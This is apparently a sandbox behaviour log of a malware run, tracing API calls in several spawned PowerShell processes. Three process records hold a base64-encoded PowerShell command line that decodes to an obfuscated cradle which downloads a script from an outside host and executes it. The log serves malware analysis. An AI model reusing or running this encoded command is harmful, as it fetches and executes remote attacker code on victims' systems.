	[0964.120] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0964.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0964.120] CoTaskMemFree (pv=0x1b7241c0) 
	[0966.564] WinSqmIsOptedIn () returned 0x0
	[0966.565] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0966.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.565] CoTaskMemFree (pv=0x1b7241c0) 
	[0966.570] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0966.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.570] CoTaskMemFree (pv=0x1b7241c0) 
	[0967.577] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0967.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.577] CoTaskMemFree (pv=0x1b7241c0) 
	[0967.578] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0967.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.578] CoTaskMemFree (pv=0x1b7241c0) 
	[0967.578] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0967.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0967.578] CoTaskMemFree (pv=0x1b7241c0) 
	[0968.911] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0968.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.911] CoTaskMemFree (pv=0x1b7241c0) 
	[0968.911] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0968.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.911] CoTaskMemFree (pv=0x1b7241c0) 
	[0968.912] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0968.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.912] CoTaskMemFree (pv=0x1b7241c0) 
	[0968.913] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0968.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.914] CoTaskMemFree (pv=0x1b7241c0) 
	[0970.138] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0970.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.138] CoTaskMemFree (pv=0x1b7241c0) 
	[0970.141] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0970.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.141] CoTaskMemFree (pv=0x1b7241c0) 
	[0970.141] CoTaskMemAlloc (cb=0x104) returned 0x1b7241c0
	[0970.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7241c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0970.141] CoTaskMemFree (pv=0x1b7241c0) 
	[0982.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0982.642] CoTaskMemAlloc (cb=0x104) returned 0x1b7240b0
	[0982.642] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b7240b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0982.642] CoTaskMemFree (pv=0x1b7240b0) 
	[0983.528] CoTaskMemAlloc (cb=0xcc) returned 0x2c1750
	[0983.528] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2c1750, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.529] CoTaskMemFree (pv=0x2c1750) 
	[0983.529] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d888 | out: phkResult=0x18d888*=0x2f0) returned 0x0
	[0983.529] RegQueryValueExW (in: hKey=0x2f0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d80c, lpData=0x0, lpcbData=0x18d808*=0x0 | out: lpType=0x18d80c*=0x2, lpData=0x0, lpcbData=0x18d808*=0x6c) returned 0x0
	[0983.529] CoTaskMemAlloc (cb=0x70) returned 0x2601b0
	[0983.529] RegQueryValueExW (in: hKey=0x2f0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d7dc, lpData=0x2601b0, lpcbData=0x18d7d8*=0x6c | out: lpType=0x18d7dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x18d7d8*=0x6c) returned 0x0
	[0983.529] CoTaskMemFree (pv=0x2601b0) 
	[0983.529] CoTaskMemAlloc (cb=0xcc) returned 0x2c1750
	[0983.529] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2c1750, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0983.529] CoTaskMemFree (pv=0x2c1750) 
	[0983.529] CoTaskMemAlloc (cb=0xcc) returned 0x2c1750
	[0983.530] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2c1750, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.530] CoTaskMemFree (pv=0x2c1750) 
	[0983.535] RegCloseKey (hKey=0x2f0) returned 0x0
	[0983.536] CoTaskMemAlloc (cb=0xcc) returned 0x2c1750
	[0983.536] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2c1750, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0983.536] CoTaskMemFree (pv=0x2c1750) 
	[0983.536] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d888 | out: phkResult=0x18d888*=0x2f0) returned 0x0
	[0983.537] RegQueryValueExW (in: hKey=0x2f0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x18d80c, lpData=0x0, lpcbData=0x18d808*=0x0 | out: lpType=0x18d80c*=0x0, lpData=0x0, lpcbData=0x18d808*=0x0) returned 0x2
	[0983.537] RegCloseKey (hKey=0x2f0) returned 0x0

Thread:
	id = 707
	os_tid = 0x1600


Thread:
	id = 744
	os_tid = 0x16ec


Thread:
	id = 1231
	os_tid = 0x1bb8


Thread:
	id = 1235
	os_tid = 0x19e0


Thread:
	id = 1263
	os_tid = 0x1c80


Thread:
	id = 1327
	os_tid = 0x1e08


Thread:
	id = 1572
	os_tid = 0x20fc


Thread:
	id = 1573
	os_tid = 0x2108

	[0784.471] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0893.122] RegCloseKey (hKey=0x2e8) returned 0x0
	[0893.122] RegCloseKey (hKey=0x2f0) returned 0x0
	[0893.122] RegCloseKey (hKey=0x2ec) returned 0x0

Thread:
	id = 1799
	os_tid = 0x1f9c


Process:
	id = "129"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5e517000"
	os_pid = "0x1480"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 657
	os_tid = 0x1484

	[0435.167] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 716
	os_tid = 0x1624


Thread:
	id = 750
	os_tid = 0x1704


Thread:
	id = 1543
	os_tid = 0x206c


Thread:
	id = 1551
	os_tid = 0x208c


Thread:
	id = 1604
	os_tid = 0x2188


Thread:
	id = 1706
	os_tid = 0x23e4


Process:
	id = "130"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5b625000"
	os_pid = "0x14b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 666
	os_tid = 0x14bc

	[0435.356] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 710
	os_tid = 0x160c


Thread:
	id = 749
	os_tid = 0x1700


Process:
	id = "131"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5d932000"
	os_pid = "0x14e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 672
	os_tid = 0x14ec

	[0435.246] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0828.335] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0837.845] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0837.846] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0837.846] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0837.846] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0940.499] GetVersionExW (in: lpVersionInformation=0x1adb00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adb00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.501] GetVersionExW (in: lpVersionInformation=0x1adb00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1adb00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0940.514] GetVersionExW (in: lpVersionInformation=0x1ad870*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad870*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0940.515] SetErrorMode (uMode=0x1) returned 0x1
	[0940.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad9d0 | out: lpFileInformation=0x1ad9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0940.517] SetErrorMode (uMode=0x1) returned 0x1
	[0940.520] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adc40 | out: lpdwHandle=0x1adc40) returned 0x94c
	[0940.592] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2be72f0 | out: lpData=0x2be72f0) returned 1
	[0940.595] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adbb8, puLen=0x1adbb0 | out: lplpBuffer=0x1adbb8*=0x2be738c, puLen=0x1adbb0) returned 1
	[0940.597] lstrlenW (lpString="䅁") returned 1
	[0940.606] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be7468, puLen=0x1adb20) returned 1
	[0940.606] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0940.608] CoTaskMemAlloc (cb=0x2e) returned 0x41ba10
	[0940.609] lstrcpyW (in: lpString1=0x41ba10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0940.610] CoTaskMemFree (pv=0x41ba10) 
	[0940.610] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be74bc, puLen=0x1adb20) returned 1
	[0940.610] lstrlenW (lpString="System.Management.Automation") returned 28
	[0940.610] CoTaskMemAlloc (cb=0x3c) returned 0x359770
	[0940.610] lstrcpyW (in: lpString1=0x359770, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0940.610] CoTaskMemFree (pv=0x359770) 
	[0940.610] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be7518, puLen=0x1adb20) returned 1
	[0940.610] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0940.610] CoTaskMemAlloc (cb=0x20) returned 0x4133e0
	[0940.610] lstrcpyW (in: lpString1=0x4133e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0940.610] CoTaskMemFree (pv=0x4133e0) 
	[0940.610] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be7558, puLen=0x1adb20) returned 1
	[0940.610] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0940.610] CoTaskMemAlloc (cb=0x44) returned 0x359770
	[0940.610] lstrcpyW (in: lpString1=0x359770, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0940.610] CoTaskMemFree (pv=0x359770) 
	[0940.610] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be75c0, puLen=0x1adb20) returned 1
	[0940.610] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0940.610] CoTaskMemAlloc (cb=0x76) returned 0x3c1400
	[0940.610] lstrcpyW (in: lpString1=0x3c1400, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0940.610] CoTaskMemFree (pv=0x3c1400) 
	[0940.610] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be765c, puLen=0x1adb20) returned 1
	[0940.610] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0940.610] CoTaskMemAlloc (cb=0x44) returned 0x359770
	[0940.610] lstrcpyW (in: lpString1=0x359770, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0940.610] CoTaskMemFree (pv=0x359770) 
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be76c0, puLen=0x1adb20) returned 1
	[0940.611] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0940.611] CoTaskMemAlloc (cb=0x58) returned 0x37b190
	[0940.611] lstrcpyW (in: lpString1=0x37b190, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0940.611] CoTaskMemFree (pv=0x37b190) 
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be773c, puLen=0x1adb20) returned 1
	[0940.611] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0940.611] CoTaskMemAlloc (cb=0x20) returned 0x4133e0
	[0940.611] lstrcpyW (in: lpString1=0x4133e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0940.611] CoTaskMemFree (pv=0x4133e0) 
	[0940.611] VerQueryValueW (in: pBlock=0x2be72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1adb28, puLen=0x1adb20 | out: lplpBuffer=0x1adb28*=0x2be73e4, puLen=0x1adb20) returned 1
	[0940.611] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0940.611] CoTaskMemAlloc (cb=0x66) returned 0x38b990
